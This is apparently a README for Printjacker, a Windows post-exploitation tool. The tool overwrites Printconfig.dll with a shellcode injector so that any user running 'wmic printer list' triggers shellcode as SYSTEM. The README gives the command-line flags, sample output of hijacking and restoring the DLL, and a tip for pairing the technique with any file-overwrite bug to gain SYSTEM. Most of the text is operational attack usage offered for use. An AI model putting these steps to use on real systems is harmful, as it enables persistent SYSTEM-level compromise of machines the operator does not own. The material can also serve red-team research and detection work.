Printjacker is a post-exploitation tool that creates a persistence mechanism by overwriting Printconfig.dll with a shellcode injector. The persistence mechanism can be invoked via executing wmic printer list
command with any user. The shellcode will be executed with SYSTEM privileges. Details:
- Change the shellcode in dllmain.cpp
- Compile Printjacker with VS2019 (tested). New printconfig.dll will be compiled and added to resources of Printjacker.exe.
- Execute with Admin privileges.
.\printjacker.exe [-find] | [-hijack] | [-execute] | [-schedule] | [-restore]
-find : Find the directory of Printconfig.dll
-hijack : Overwrite Printconfig.dll with shellcode injector and copy original to Printconfig_orig.dll
-execute : Hijack Printconfig.dll and execute "wmic printer list" as the current user
-schedule : Hijack printconfig.dll and schedule "wmic printer list"
-restore : Restore Printconfig.dll to original
- Hijack Printconfig.dll and execute the payload
.\printjacker.exe -execute
# Printjacker - Hijack Printconfig.dll
[*] PrintConfig.dll is found: c:\windows\system32\DriverStore\FileRepository\prnms003.inf_amd64_9d6cd193d2dd61fd\Amd64
[+] Resource is found. Trying to modify the target file...
[+] Original Dll is copied to Princonfig_orig.dll
[+] Printconfig.dll is successfully modified!
[*] Working in Execute mode
[*] Trying to execute payload by using "wmic printer list"...
- Restore the original printconfig.dll
.\printjacker.exe -restore
[*] PrintConfig.dll is found: c:\windows\system32\DriverStore\FileRepository\prnms003.inf_amd64_9d6cd193d2dd61fd\Amd64
[+] Printconfig.dll is restored from Printconfig_orig.dll
- If you have only file overwrite privilege without command execution, you can still use compiled printconfig.dll to gain SYSTEM privileges.
.\printjacker.exe -find
[*] PrintConfig.dll is found: c:\windows\system32\DriverStore\FileRepository\prnms003.inf_amd64_9d6cd193d2dd61fd\Amd64
- Overwrite the original printconfig.dll with your favourite file overwrite vulnerability, then execute
wmic printer list
with any user.
Thanks to great works by @SandboxBear, @tiraniddo, @aionescu, @yarden_shafir, @decoder_it, @spotheplanet ...
- Generate pipename from UUID
- Compatibility for x86